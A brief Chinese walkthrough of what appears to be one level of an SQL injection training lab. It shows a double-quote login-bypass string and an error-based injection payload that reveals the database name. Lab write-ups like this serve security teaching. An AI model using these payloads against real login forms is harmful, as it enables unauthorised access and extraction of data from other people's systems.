这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的,
直接可以用万能密码成功登录,比如123" or 1=1#
在获取数据库信息是把')替换为"即可。
payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a#&passwd=111&submit=Submit,得到数据库名security
